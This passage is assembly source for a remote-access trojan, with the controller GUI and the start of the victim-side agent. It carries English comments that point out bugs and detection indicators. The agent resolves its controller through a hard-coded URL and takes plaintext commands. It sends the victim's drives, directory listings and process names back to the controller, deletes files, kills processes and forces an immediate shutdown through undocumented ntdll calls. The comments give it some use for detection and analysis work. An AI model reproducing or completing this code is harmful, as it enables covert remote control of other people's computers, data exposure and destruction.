; OFN_FILEMUSTEXIST the dialog only accepts existing files anyway.
local @stOF:OPENFILENAME
local @stES:EDITSTREAM
;********************************************************************
; Show the "Open File" dialog
;********************************************************************
invoke RtlZeroMemory,addr @stOF,sizeof @stOF
mov @stOF.lStructSize,sizeof @stOF
push hWinMain
pop @stOF.hwndOwner
mov @stOF.lpstrFilter,offset szFilter
mov eax,_FileBuff
mov @stOF.lpstrFile,eax
mov @stOF.nMaxFile,MAX_PATH
mov @stOF.Flags,OFN_FILEMUSTEXIST or OFN_PATHMUSTEXIST
mov @stOF.lpstrDefExt,CTXT("文件")
invoke GetOpenFileName,addr @stOF
ret
_OpenFile endp
;>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>
; 显示肉鸡上线数量
;>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>
_AddClient proc _hSocket
; Thread entry (started from _ProcDlgMain on FD_ACCEPT) that registers a
; newly accepted agent socket:
;  - asks Winsock to post WM_SOCKET to hWinMain for FD_READ / FD_CLOSE,
;  - stores the handle in the first free DWORD slot of the global stTable
;    (MAX_SOCKET slots), bumps dwCount, and adds the handle as a hex string
;    to IDC_ServerList (this string is what GetSocketAndSend parses back),
;  - refreshes the connection counter IDC_Socket.
; If the table is full the socket is simply closed.
; stTable, dwCount and the scratch buffer @buff are globals shared between
; this thread and _RemoveClient with no synchronisation.
; ebx/esi are used without `uses`; as a thread entry nothing depends on them.
invoke WSAAsyncSelect,_hSocket,hWinMain,WM_SOCKET,FD_READ or FD_CLOSE
xor ebx,ebx ; slot index
mov esi,offset stTable ; esi -> current slot
.while ebx < MAX_SOCKET
.if ! dword ptr [esi] ; free slot?
push _hSocket
pop [esi]
inc dwCount
invoke wsprintf,addr @buff,CTXT("%x"),_hSocket ; handle as hex text
invoke SendDlgItemMessage,hWinMain,IDC_ServerList,LB_ADDSTRING,0,addr @buff
invoke SetDlgItemInt,hWinMain,IDC_Socket,dwCount,FALSE ; show new connection count
ret
.endif
inc ebx
add esi,4
.endw
invoke closesocket,_hSocket ; table full: drop the connection
ret
_AddClient endp
;>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>
;肉鸡下线就去掉一个socket,并删除ListBox里的socket编号
;>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>
_RemoveClient proc _hSocket
; Thread entry (started from _ProcDlgMain on FD_CLOSE): finds _hSocket in
; stTable, closes it, frees the slot, decrements dwCount, writes a
; "host went offline" line stamped with the current system time (UTC, from
; GetSystemTime) into the list view and the IDC_Log list box, and removes
; the *currently selected* entry of IDC_ServerList — not necessarily the
; entry that belongs to this socket.
; Observations (left as is):
;  - the format string labels its last field as seconds but wMinute is passed;
;  - ecx holds wDay when ShowProcess is invoked, so that becomes `row`, and the
;    following `inc ecx` acts on a register the call has already clobbered;
;  - @dwListviewitem is unused; ebx/esi/edi are used without `uses`.
local szTime:SYSTEMTIME
local szBuff[1024]:DWORD
local @dwListviewitem
xor ebx,ebx ; slot index
xor ecx,ecx
mov esi,offset stTable
mov edi,_hSocket
.while ebx < MAX_SOCKET
.if [esi] == edi ; slot holding this socket
invoke closesocket,[esi]
mov dword ptr [esi],0 ; free the slot
dec dwCount
invoke SetDlgItemInt,hWinMain,IDC_Socket,dwCount,FALSE
invoke GetSystemTime,addr szTime
movzx eax,szTime.wMonth
movzx ecx,szTime.wDay
movzx edx,szTime.wHour
movzx ebx,szTime.wMinute
invoke wsprintf,addr szBuff,CTXT("有主机下线请注意,下线时间为:%d月%d日%d时%d秒"),eax,ecx,edx,ebx
; invoke _ListViewSetItem,hlistview,@dwListviewitem,ONE-1,addr szBuff
invoke ShowProcess,ecx,addr szBuff ; row = ecx (wDay at this point)
inc ecx
invoke SendDlgItemMessage,hWinMain,IDC_Log,LB_ADDSTRING,0,addr szBuff
invoke SendDlgItemMessage,hWinMain,IDC_ServerList,LB_GETCURSEL,0,0
invoke SendDlgItemMessage,hWinMain,IDC_ServerList,LB_DeleteSTRING,eax,0 ; removes the selected entry, whichever it is
ret
.endif
inc ebx
add esi,4
.endw
ret
_RemoveClient endp
;>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>
; 处理接收到的TCP包
;>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>
_RecvDataServer proc _hSocket
; Thread entry (started from _ProcDlgMain on FD_READ): reads one chunk from
; an agent socket into the global szReadBuffer and classifies it by
; substring:
;   contains ":/"      -> a drive or path entry: appended to the file dialog's
;                         IDC_FileList and counted in lpAllFile;
;   no ":/" but ".exe" -> a process name: appended to the process dialog's
;                         IDC_ProcessList and counted in lpShuMu;
;   contains "[info]"  -> the agent's check-in; everything but the trailing
;                         6-byte tag is copied to global buff2 (not displayed).
; This copy of the source appears to render "\" as "/", so the path test
; is presumably ":\".
; The recv() return value is ignored — a 0 / SOCKET_ERROR result still runs
; the classification on the zeroed buffer — and every FD_READ spawns a new
; thread using the same global buffer, so concurrent reads can interleave.
; A chunk that fills the buffer completely leaves no room for a NUL.
invoke RtlZeroMemory,addr szReadBuffer,sizeof szReadBuffer
invoke recv,_hSocket,addr szReadBuffer,sizeof szReadBuffer,NULL
invoke StrStr,addr szReadBuffer,CTXT(":/") ; classify: a ":/" means this is a file path
.if eax!=NULL
inc lpAllFile
invoke SendDlgItemMessage,hWinMain2,IDC_FileList,LB_ADDSTRING,0,addr szReadBuffer
invoke SetDlgItemText,hWinMain2,IDC_GetSomeThing,addr szReadBuffer
invoke wsprintf,addr szFileShuMu,CTXT("%d 个文件或目录"),lpAllFile
invoke SetDlgItemText,hWinMain2,IDC_AllFile,addr szFileShuMu
.endif
; invoke StrStr,addr szReadBuffer,CTXT("computerIP")
; .if eax!=NULL
; invoke SendDlgItemMessage,hWinMain,IDC_ServerList,LB_ADDSTRING,0,addr szReadBuffer
; .endif.
invoke StrStr,addr szReadBuffer,CTXT(":/") ; classify: no ":/" but ".exe" means this is a process name
.if eax==NULL
invoke StrStr,addr szReadBuffer,CTXT(".exe")
.if eax!=NULL
inc lpShuMu
invoke SendDlgItemMessage,hWinMain1,IDC_ProcessList,LB_ADDSTRING,0,addr szReadBuffer
invoke wsprintf,addr szProcessShuMu,CTXT("%d 个进程"),lpShuMu
invoke SetDlgItemText,hWinMain1,IDC_ProcessShuMu,addr szProcessShuMu
.endif
.endif
; If the data carries the "[info]" marker it is the agent's check-in record;
; strip the 6-byte "[info]" tag from it (assumes the tag is last).
invoke StrStr,addr szReadBuffer,CTXT("[info]")
.if eax!=NULL
pushad
invoke lstrlen,addr szReadBuffer
sub eax,6 ; payload length = total - 6-byte tag
lea esi,szReadBuffer
lea edi,buff2
add esi,0 ; no-op
mov ecx,eax
rep movsb ; copy payload into buff2
mov byte ptr [edi],0
popad
;invoke MessageBox,0,addr buff2,0,0
.endif
ret
_RecvDataServer endp
;>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>
; 初始化 Socket,绑定到服务TCP端口并监听
;>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>
_Init proc
; Controller listener: requests Winsock 1.1, creates a TCP socket, asks
; Winsock to post WM_SOCKET to hWinMain on FD_ACCEPT, binds to port 9999 on
; every interface (INADDR_ANY) and listens with backlog 5.  Triggered from
; _ProcDlgMain by IDC_Port.
; Only a failed bind() is handled (reported as "already listening");
; WSAStartup / socket / listen results are not checked.
; Nothing in this protocol authenticates the agents that connect here.
local @stWsa:WSADATA
local @stSin:sockaddr_in
invoke WSAStartup,101h,addr @stWsa
invoke socket,AF_INET,SOCK_STREAM,0
mov Socket,eax ; global listening socket
invoke WSAAsyncSelect,Socket,hWinMain,WM_SOCKET,FD_ACCEPT
invoke RtlZeroMemory,addr @stSin,sizeof @stSin
invoke htons,9999 ; must match the port the agent connects to (server.asm _Main)
mov @stSin.sin_port,ax
mov @stSin.sin_family,AF_INET
mov @stSin.sin_addr,INADDR_ANY
invoke bind,Socket,addr @stSin,sizeof @stSin
.if eax == SOCKET_ERROR
invoke MessageBox,hWinMain,CTXT("本程序已经监听,无法进行第二次操作"),NULL,/
MB_OK or MB_ICONWARNING
ret
.else
invoke listen,Socket,5
.endif
ret
_Init endp
;>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>
;>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>
_ProcDlgProcess proc uses ebx edi esi hWnd1,wMsg,wParam,lParam
; Dialog procedure for the "process" dialog (DLG_Process).  Each action is
; a plaintext command tag sent to the selected agent with GetSocketAndSend:
;   IDC_GetProcessList / IDC_RefeProcessList -> "[getprocess]" (list box
;        cleared and lpShuMu reset first; replies arrive in _RecvDataServer)
;   IDC_ProcessList LBN_SELCHANGE -> "<name>[killprocess]" after a Yes/No prompt
;   IDC_ExitWindows               -> "[exitwindows]" after a Yes/No prompt
; Stores the dialog handle in the global hWinMain1 on WM_INITDIALOG.
; Returns TRUE for handled messages, FALSE otherwise.
local @szBuffer[128]:byte
local szKillProcess[1024]:byte
local szOut[1024]:byte
mov eax,wMsg
.if eax == WM_CLOSE
invoke EndDialog,hWnd1,NULL
.elseif eax == WM_INITDIALOG
push hWnd1
pop hWinMain1
invoke LoadIcon,hInstance,ICO_MAIN
invoke SendMessage,hWnd1,WM_SETICON,ICON_BIG,eax
.elseif eax == WM_COMMAND
mov eax,wParam
.if ax == IDC_GetProcessList
mov lpShuMu,0
invoke SendDlgItemMessage,hWnd1,IDC_ProcessList,LB_RESETCONTENT,0,0
invoke GetSocketAndSend,CTXT("[getprocess]")
.elseif ax == IDC_ProcessList
shr eax,16 ; notification code
.if ax == LBN_SELCHANGE
;********************************************************************
; Show the clicked entry and ask for confirmation
;********************************************************************
invoke SendMessage,lParam,LB_GETCURSEL,0,0
lea ecx,@szBuffer
invoke SendMessage,lParam,LB_GETTEXT,eax,ecx
invoke wsprintf,addr szOut,CTXT("你确定要结束对方 %s 这个进程吗?"),addr @szBuffer
invoke MessageBox,hWnd1,addr szOut,CTXT("友情提示"),MB_YESNO or MB_ICONINFORMATION
.if eax!=IDNO
invoke RtlZeroMemory,addr szKillProcess,sizeof szKillProcess
invoke lstrcat,addr szKillProcess,addr @szBuffer
invoke lstrcat,addr szKillProcess,CTXT("[killprocess]") ; payload first, tag last (the agent strips the 13-byte tag)
invoke GetSocketAndSend,addr szKillProcess
.endif
.endif
.elseif ax == IDC_RefeProcessList
mov lpShuMu,0
invoke SendDlgItemMessage,hWinMain1,IDC_ProcessList,LB_RESETCONTENT,0,0
invoke GetSocketAndSend,CTXT("[getprocess]")
.elseif ax == IDC_ExitWindows
invoke MessageBox,hWnd1,CTXT("这条命令会无条件关闭对方电脑,是否要执行?"),CTXT("友情提示"),MB_YESNO or MB_ICONINFORMATION
.if eax!=IDNO
invoke GetSocketAndSend,CTXT("[exitwindows]")
.endif
.endif
.else
mov eax,FALSE
ret
.endif
mov eax,TRUE
ret
_ProcDlgProcess endp
;>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>
;>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>
_ProcDlgFile proc uses ebx edi esi hWnd1,wMsg,wParam,lParam
; Dialog procedure for the "file" dialog (DLG_File).  Commands sent to the
; selected agent (plaintext tags; server.asm _Main is the receiver):
;   WM_INITDIALOG, IDC_RefeFileList -> "[getfile]"           (drive list)
;   IDC_FileList LBN_SELCHANGE      -> "<path>[getfilepaht]" (directory listing;
;                                      the misspelled tag is the wire format)
;   IDC_DelFile                     -> "<path>[delfile]"
;   IDC_LookFile1 / IDC_LookFile2   -> local Open dialog only; the
;                                      upload/download branch (IDC_CHECK2,
;                                      IDC_LoadDownFile) is empty.
; Stores the dialog handle in the global hWinMain2 on WM_INITDIALOG.
; Observations (left as is): the "really delete?" MessageBox is created
; with MB_ICONINFORMATION only (OK button), so eax is never IDNO and the
; prompt cannot cancel; `sub eax,0` is a no-op and the copy into `buff`
; (skipping 2 bytes) is never used; szDelFile is a global appended to with
; lstrcat and never cleared, so repeated deletions accumulate paths; the
; MessageBox showing szDelFile looks like leftover debugging output.
local @szBuffer1[1024]:byte
local @szBuffer2[1024]:byte
local buff[1024]:byte
mov eax,wMsg
.if eax == WM_CLOSE
invoke EndDialog,hWnd1,NULL
.elseif eax == WM_INITDIALOG
push hWnd1
pop hWinMain2
invoke LoadIcon,hInstance,ICO_MAIN
invoke SendMessage,hWnd1,WM_SETICON,ICON_BIG,eax
mov lpAllFile,0
invoke GetSocketAndSend,CTXT("[getfile]")
;invoke SendDlgItemMessage,hWnd1,IDC_FileList,LB_ADDSTRING,0,CTXT("d:/asm.txt")
.elseif eax == WM_COMMAND
mov eax,wParam
.if ax == IDC_LookFile1
invoke _OpenFile,addr szBenDiFile
invoke SetDlgItemText,hWnd1,IDC_BenDiFile,addr szBenDiFile
.elseif ax == IDC_FileList
mov lpAllFile,0
shr eax,16 ; notification code
.if ax == LBN_SELCHANGE
;********************************************************************
; Take the clicked entry as the next path to list
;********************************************************************
invoke SendMessage,lParam,LB_GETCURSEL,0,0
lea ecx,@szBuffer1
invoke SendMessage,lParam,LB_GETTEXT,eax,ecx
invoke RtlZeroMemory,addr @szBuffer2,sizeof @szBuffer2
invoke lstrcat,addr @szBuffer2,addr @szBuffer1
invoke lstrcat,addr @szBuffer2,CTXT("[getfilepaht]") ; payload first, tag last
invoke GetSocketAndSend,addr @szBuffer2
invoke SendDlgItemMessage,hWnd1,IDC_FileList,LB_RESETCONTENT,0,0
invoke SetDlgItemText,hWnd1,IDC_YuanChengFile,addr @szBuffer1
invoke SetDlgItemText,hWnd1,IDC_FileToLoadOnYuanCheng,addr @szBuffer1
invoke SetDlgItemText,hWnd1,IDC_FileToDel,addr @szBuffer1
.endif
.elseif ax == IDC_LookFile2
invoke _OpenFile,addr szBenDiFile1
invoke SetDlgItemText,hWnd1,IDC_FileToLoadOnBenDi,addr szBenDiFile1
.elseif (ax == IDC_CHECK2)||(ax == IDC_LoadDownFile)
; not implemented
.elseif ax == IDC_DelFile
invoke MessageBox,hWnd1,CTXT("真的要删除远程主机上的文件吗?"),CTXT("友情提示"),MB_ICONINFORMATION
.if eax!=IDNO ; always true: the box above has only an OK button
invoke GetDlgItemText,hWnd1,IDC_FileToDel,addr szFileToDel,sizeof szFileToDel
invoke lstrlen,addr szFileToDel
sub eax,0 ; no-op
lea esi,szFileToDel
lea edi,buff
add esi,2
mov ecx,eax
rep movsb ; copies the path minus its first two bytes into buff (unused afterwards)
mov byte ptr [edi],0
invoke StrStr,addr szFileToDel,CTXT(".")
.if eax==NULL
invoke MessageBox,NULL,CTXT("你选择的不是文件,无法删除"),CTXT("友情提示"),MB_ICONSTOP
.elseif eax!=NULL
invoke lstrcat,addr szDelFile,addr szFileToDel
invoke lstrcat,addr szDelFile,CTXT("[delfile]")
invoke lstrlen,addr szDelFile
invoke MessageBox,0,addr szDelFile,0,0
invoke GetSocketAndSend,addr szDelFile
.endif
.endif
.elseif ax == IDC_RefeFileList
mov lpAllFile,0
invoke SendDlgItemMessage,hWnd1,IDC_FileList,LB_RESETCONTENT,0,0
invoke GetSocketAndSend,CTXT("[getfile]")
.endif
.else
mov eax,FALSE
ret
.endif
mov eax,TRUE
ret
_ProcDlgFile endp
;>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>
_ProcDlgMain proc uses ebx edi esi hWnd,wMsg,wParam,lParam
; Main dialog procedure of the controller.  WM_SOCKET is the notification
; message registered with WSAAsyncSelect (in _Init and _AddClient); the
; event is in the low word of lParam and the socket in wParam:
;   FD_ACCEPT -> accept(), then a thread running _AddClient on the new socket
;   FD_READ   -> a thread running _RecvDataServer
;   FD_CLOSE  -> a thread running _RemoveClient
; Thread handles returned by CreateThread are never closed.  hSocket1 is a
; global, so two FD_ACCEPT notifications in quick succession can hand the
; same value to both threads.
; WM_COMMAND: IDC_Port starts the listener (_Init), IDC_Process / IDC_File
; open the sub-dialogs, IDC_LoadServer is a stub.
; WM_INITDIALOG stores the window in hWinMain and the IDC_Log control in
; hlistview (used by ShowProcess).
mov eax,wMsg
.if eax == WM_SOCKET
mov eax,lParam
.if ax == FD_ACCEPT
invoke accept,wParam,0,0 ; take the pending connection
mov hSocket1,eax
invoke CreateThread,NULL,0,addr _AddClient,hSocket1,0,addr ThreadId
.elseif ax == FD_READ
invoke CreateThread,NULL,0,addr _RecvDataServer,wParam,0,addr ThreadId1
.elseif ax == FD_CLOSE
invoke CreateThread,NULL,0,addr _RemoveClient,wParam,0,addr ThreadId2
.endif
.elseif eax == WM_CLOSE
invoke closesocket,Socket
invoke WSACleanup
invoke EndDialog,hWnd,NULL
;//
.elseif eax == WM_INITDIALOG
push hWnd
pop hWinMain
invoke LoadIcon,hInstance,ICO_MAIN
invoke SendMessage,hWnd,WM_SETICON,ICON_BIG,eax
invoke GetDlgItem,hWnd,IDC_Log
mov hlistview,eax
;invoke InsertColumn
; initialise controls (nothing further implemented)
.elseif eax == WM_COMMAND
mov eax,wParam
.if ax == IDC_LoadServer
invoke MessageBox,NULL,CTXT("配制服务端,暂时不写进去"),0,0
.elseif ax == IDC_Port
call _Init
.elseif ax == IDC_Process
invoke DialogBoxParam,hInstance,DLG_Process,NULL,offset _ProcDlgProcess,NULL
.elseif ax == IDC_File
invoke DialogBoxParam,hInstance,DLG_File,NULL,offset _ProcDlgFile,NULL
.endif
.else
mov eax,FALSE
ret
.endif
mov eax,TRUE
ret
_ProcDlgMain endp
;>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>
start:
; Controller entry point: runs the main dialog modally, then exits.
invoke GetModuleHandle,NULL
mov hInstance,eax
invoke DialogBoxParam,hInstance,DLG_MAIN,NULL,offset _ProcDlgMain,NULL
invoke ExitProcess,NULL
;>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>
end start
server.asm
;******************************************************
;程序编写by Asm
;日期:2007-6-13日
;出处: http://www.wolfexp.net/(红狼安全小组)
;注意事项:如欲转载,请保持本程序的完整,并注明:
;转载自 红狼安全小组( http://www.wolfexp.net/)
;******************************************************
.386
.model flat,stdcall
option casemap:none
include windows.inc
include user32.inc
include kernel32.inc
include wsock32.inc
include Ws2_32.inc
include wininet.inc
include advapi32.inc
includelib user32.lib
includelib kernel32.lib
includelib wsock32.lib
includelib Ws2_32.lib
includelib wininet.lib
includelib advapi32.lib
include Shlwapi.inc
includelib Shlwapi.lib
include w2k/ntdll.inc
includelib ntdll.lib
include macros.inc
MSG_SYSINFO struct
; Check-in record, same layout as in client.asm: one DWORD followed by four
; 156-byte text fields.  SendSysInfo fills the four text fields of the
; global instance `sysinfo`; dwip has no visible writer.
dwip dd ?
szHostIP db 156 dup(?)
szHostName db 156 dup(?)
szHostTime db 156 dup(?)
szWhat db 156 dup(?)
MSG_SYSINFO ends
;>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>
;ntddk.inc cannot be included here because it conflicts with windows.inc, so the value of SE_SHUTDOWN_PRIVILEGE is defined by hand
SE_SHUTDOWN_PRIVILEGE equ 19
SendSysInfo proto :LPSTR ; forward declaration (the parameter actually carries the SOCKET)
.data
; Literal indicators of this build (all visible on this page), useful for
; detection content:
;   szUrl          - HTTP resource fetched by _ReadInternet to learn the
;                    controller's IP (a dead-drop resolver); note the leading
;                    space inside the literal.
;   szRegKey/szKey - registry value read by SendSysInfo and reported in the
;                    check-in as a free-text note.  This copy of the source
;                    appears to render "\" as "/", so the real path is
;                    presumably backslash-separated.
;   Elsewhere in .code: service name "GetSysService", mutex "GetSys1_Mutex",
;   User-Agent "ReadFile", and the plaintext command tags "[getprocess]",
;   "[killprocess]", "[exitwindows]", "[getfile]", "[getfilepaht]",
;   "[delfile]", "Upfile" and the check-in tag "[info]".
lpBuffer db 10024 dup(0) ; command receive buffer (_Main reads 1024 bytes at a time)
buff db "%s",13,10,0 ; format string; no user visible on this page
szUrl db ' http://www.asm32.cn/ip.txt',0 ; where the controller address is fetched from
szVol db 'C',0 ; drive-letter cursor for _GetFileDsik (modified in place)
szRegKey db "SOFTWARE/Microsoft/Windows",0
szKey db "zhushi",0 ;name of the value read under szRegKey
.data?
szIP db 1024 dup(?) ; controller IP text as downloaded by _ReadInternet
buff1 db 1025 dup(?)
szSerice db 1024 dup(?)
server SOCKET ? ; connection to the controller (port 9999)
client SOCKET ?
hWinMain dd ?
hSnapShot dd ? ; Toolhelp snapshot handle shared by _KillProcess / _GetProcessList
closepid dd ? ; PID matched in _KillProcess
Pid dd ?
dwFolderCount dd ? ; directories seen by _GetFilePath
@stData WSADATA<?>
ThreadId DWORD ? ; one lpThreadId slot per command-thread kind (_Main)
ThreadId1 DWORD ?
ThreadId2 DWORD ?
ThreadId3 DWORD ?
ThreadId4 DWORD ?
ThreadId5 DWORD ?
ThreadId6 DWORD ?
ThreadId7 DWORD ?
stMsg MSG<?>
szHostName db 1024 dup(?) ; local host name (SendSysInfo)
SendData db 1024 dup(?)
SendData1 db 1024 dup(?)
szHost db 1024 dup(?) ; dotted-quad of the local host (SendSysInfo)
buffer db 1024 dup(?)
buff2 db 1024 dup(?) ; process name passed to _KillProcess
buff3 db 1024 dup(?) ; path passed to _GetFilePath
buff4 db 1024 dup(?) ; path passed to _DelFile
buff5 db 10024 dup(?) ; "Upfile" payload (handler commented out)
buff6 db 10024 dup(?)
sysinfo MSG_SYSINFO<?> ; check-in record filled by SendSysInfo
szSysinfoData db 1024 dup(?) ; check-in bytes as sent (appended to on every call)
szKeyName db 100 dup(?) ; registry value data (SendSysInfo)
.const
MEMORYSIZE equ 50 ; no user visible on this page
.code
;>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>
_DelFile proc _filename:DWORD
; Thread entry for the "[delfile]" command: deletes the file named in the
; command payload (global buff4) on this host, with this process's
; privileges.  DeleteFile's result is returned only as the thread exit code.
invoke DeleteFile,_filename
ret
_DelFile endp
;>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>
_GetFilePath proc _lpszPath
; Thread entry for the "[getfilepaht]" command: enumerates one directory
; (_lpszPath) with FindFirstFile/FindNextFile and send()s each entry's full
; path to the controller (global `server`), one entry per send with a 1 s
; Sleep in between.  Despite the old comment about recursion, directories
; are only counted in dwFolderCount and sent — they are not descended into.
; The '.' test compares only the first byte of cFileName, so it skips "."
; and ".." but also any name beginning with '.'.
; Network tell: a slow, one-path-per-second stream of plaintext paths on the
; controller connection.  hWnd is unused.  This copy of the source appears
; to render "\" as "/".
local @stFindFile:WIN32_FIND_DATA
local @hFindFile
local @szPath[MAX_PATH]:byte ; holds "path\"
local @szSearch[MAX_PATH]:byte ; holds "path\*.*"
local @szFindFile[1025]:byte ; holds "path\<found entry>"
local hWnd
pushad
invoke RtlZeroMemory,addr @szPath,sizeof @szPath
invoke RtlZeroMemory,addr @szSearch,sizeof @szSearch
invoke lstrcpy,addr @szPath,_lpszPath
;********************************************************************
; Append the separator and *.* to the path
;********************************************************************
@@:
invoke lstrlen,addr @szPath
lea ecx,@szPath
add ecx,eax ; ecx -> terminating NUL
xor eax,eax
mov al,'/'
.if byte ptr [ecx-1] != al ; no trailing separator yet?
mov word ptr [ecx],ax ; write separator + NUL (ah is 0)
.endif
invoke lstrcpy,addr @szSearch,addr @szPath
invoke lstrcat,addr @szSearch,CTXT("*.*")
;********************************************************************
; Enumerate the directory
;********************************************************************
invoke FindFirstFile,addr @szSearch,addr @stFindFile
.if eax != INVALID_HANDLE_VALUE
mov @hFindFile,eax
.repeat
invoke lstrcpy,addr @szFindFile,addr @szPath
invoke lstrcat,addr @szFindFile,addr @stFindFile.cFileName
.if @stFindFile.dwFileAttributes & FILE_ATTRIBUTE_DIRECTORY ; is the entry a directory?
.if @stFindFile.cFileName != '.' ; first byte only
inc dwFolderCount
; invoke MessageBox,0,addr @szFindFile,0,MB_ICONSTOP ; (original note: "recurse into the directory" — no recursion is implemented)
invoke lstrlen,addr @szFindFile
invoke send,server,addr @szFindFile,eax,0
invoke Sleep,1000
.endif
.else
; invoke MessageBox,0,addr @szFindFile,0,MB_ICONINFORMATION
invoke lstrlen,addr @szFindFile
invoke send,server,addr @szFindFile,eax,0
invoke Sleep,1000
.endif
invoke FindNextFile,@hFindFile,addr @stFindFile
.until eax == FALSE
invoke FindClose,@hFindFile
.endif
popad
ret
_GetFilePath endp
;>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>
_GetFileDsik proc _socket
; Thread entry for the "[getfile]" command: walks drive letters C..Z by
; incrementing the global szVol in place, builds "X:\" in szDisk (this copy
; of the source appears to render "\" as "/"), and send()s the letters whose
; type is DRIVE_FIXED or DRIVE_REMOVABLE, 1 s apart.  The controller
; recognises these replies by the ":\" substring.
; szVol is a global cursor, so the proc is not re-entrant and leaves szVol
; past 'Z' when it returns (it is reset by lstrcpy at the next call).
local szDisk[10]:byte
invoke Sleep,10
invoke lstrcpy,addr szVol,CTXT("C")
.while szVol<='Z'
invoke lstrcat,addr szDisk,addr szVol
invoke lstrcat,addr szDisk,CTXT(":/")
invoke GetDriveType,addr szDisk
.if eax==DRIVE_FIXED
invoke lstrlen,addr szDisk
invoke send,_socket,addr szDisk,eax,0
invoke Sleep,1000
.elseif eax==DRIVE_REMOVABLE
invoke lstrlen,addr szDisk
invoke send,_socket,addr szDisk,eax,0
invoke Sleep,1000
.endif
invoke RtlZeroMemory,addr szDisk,sizeof szDisk
inc szVol ; next drive letter
.endw
ret
_GetFileDsik endp
;>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>
_ExitWindows proc
; Thread entry for the "[exitwindows]" command: enables SE_SHUTDOWN_PRIVILEGE
; through the undocumented ntdll export RtlAdjustPrivilege and then calls
; ZwShutdownSystem(2) — an immediate power-off with no warning to the
; logged-on user and no chance to save work.
; The second adjust and the shutdown only run when the first call returned
; 0C000007Ch (STATUS_NO_TOKEN, i.e. the calling thread has no impersonation
; token); the privilege is then enabled on the process token instead.
; A user-mode process calling ZwShutdownSystem is itself a strong
; detection signal; the privilege-enable on the token is logged when
; privilege-use auditing is on.
local ShutDown:DWORD
invoke RtlAdjustPrivilege,SE_SHUTDOWN_PRIVILEGE,TRUE,TRUE,addr ShutDown
.if eax==00C000007Ch
invoke RtlAdjustPrivilege,SE_SHUTDOWN_PRIVILEGE,TRUE,FALSE,addr ShutDown
invoke ZwShutdownSystem,2
.endif
ret
_ExitWindows endp
;>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>
_KillProcess proc processname:DWORD
; Thread entry for the "[killprocess]" command: walks a Toolhelp process
; snapshot, compares each szExeFile case-insensitively with processname
; (CompareString returns CSTR_EQUAL = 2), stores the matching PID in the
; global closepid, then opens that PID with PROCESS_TERMINATE and ends it
; with exit code -1.
; Observations: the snapshot handle (global hSnapShot) is never closed, so
; each command leaks a handle; the second argument to
; CreateToolhelp32Snapshot is a PID slot but receives a buffer address
; (ignored for TH32CS_SNAPPROCESS); ebx is overwritten without `uses`.
; Detection: a TerminateProcess with exit code -1 issued by this process
; against an unrelated PID, right after a Toolhelp snapshot.
local stProcess:PROCESSENTRY32
invoke RtlZeroMemory,addr stProcess,sizeof stProcess ; clear the entry
mov stProcess.dwSize,sizeof stProcess
invoke CreateToolhelp32Snapshot,TH32CS_SNAPPROCESS,addr stProcess
mov hSnapShot,eax
invoke Process32First,hSnapShot,addr stProcess
.while eax
invoke CompareString,LOCALE_USER_DEFAULT,NORM_IGNORECASE,processname,-1,addr stProcess.szExeFile,-1
.if eax==2 ; CSTR_EQUAL
push stProcess.th32ProcessID
pop closepid
.endif
invoke Process32Next,hSnapShot,addr stProcess
.endw
invoke OpenProcess,PROCESS_TERMINATE,FALSE,closepid
.if eax
mov ebx,eax
invoke TerminateProcess,ebx,-1
.endif
ret
_KillProcess endp
;>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>
_GetProcessList proc _socket
; Thread entry for the "[getprocess]" command: sends every image name from
; a Toolhelp process snapshot to the controller over _socket, one name per
; send() with a 1 s Sleep between them (the controller recognises the
; replies by the ".exe" substring).  hSnapShot is a shared global and the
; handle is never closed.
local stProcess:PROCESSENTRY32
invoke RtlZeroMemory,addr stProcess,sizeof stProcess ; clear the entry
